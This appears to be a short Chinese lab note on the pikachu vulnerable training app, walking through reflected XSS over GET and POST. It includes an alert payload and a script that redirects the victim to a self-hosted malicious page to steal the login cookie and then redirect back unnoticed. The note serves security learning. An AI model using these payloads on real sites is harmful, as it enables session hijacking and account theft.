pikachu--(2)关于各种XSS和CSRF
1.反射xss(get)
<script>alert(1)</script>(由于限制长度,需要修改前端的长度)
(其实get方法才是常见的,post很难做到诱导,因为涉及提交表单,用户是不会主动把你的恶意代码输入的.但我可以构造get请求:
2.反射xss(post)
登陆后和第一个的情况一样,不过这里可以窃取客户端cookie
欺骗cookie过程:(好像这个过程和那个输入框没什么关系,主要是诱导用户点击)
(1)诱导用户点击:(如输入框输入:<script>document.location = ‘http://127.0.0.1:801/pikachu-master/pkxss/xcookie/post.html‘;</script>)
http://127.0.0.1:801/pikachu-master/pkxss/xcookie/post.html(post.html为自己搭建的一个恶意站点)
(2)该站点向目标网站http://127.0.0.1:801/pikachu-master/vul/xss/xsspost/xss_reflected_post.php发送请求(相当于借用户进行请求拿取该用户的cookie,这不就csrf了吗....)然后获得用户登陆该网站的cookie
(3)恶意网站为防止用户发现不对劲,重定回正常的网站
相关推荐
码农成长记 2020-05-10
layloge 2020-05-03
sunlizhen 2020-04-10
码农成长记 2020-03-23
zhuangnet 2020-02-26
waitui00 2020-02-14
sswqycbailong 2020-07-28
csxiaoqiang 2020-07-26
码农成长记 2020-07-19
layloge 2020-07-05
layloge 2020-06-26
liangjielaoshi 2020-06-25
csxiaoqiang 2020-06-16
某先生 2020-06-13
ItBJLan 2020-06-11
layloge 2020-06-07
csxiaoqiang 2020-06-03
sswqycbailong 2020-06-01
layloge 2020-05-30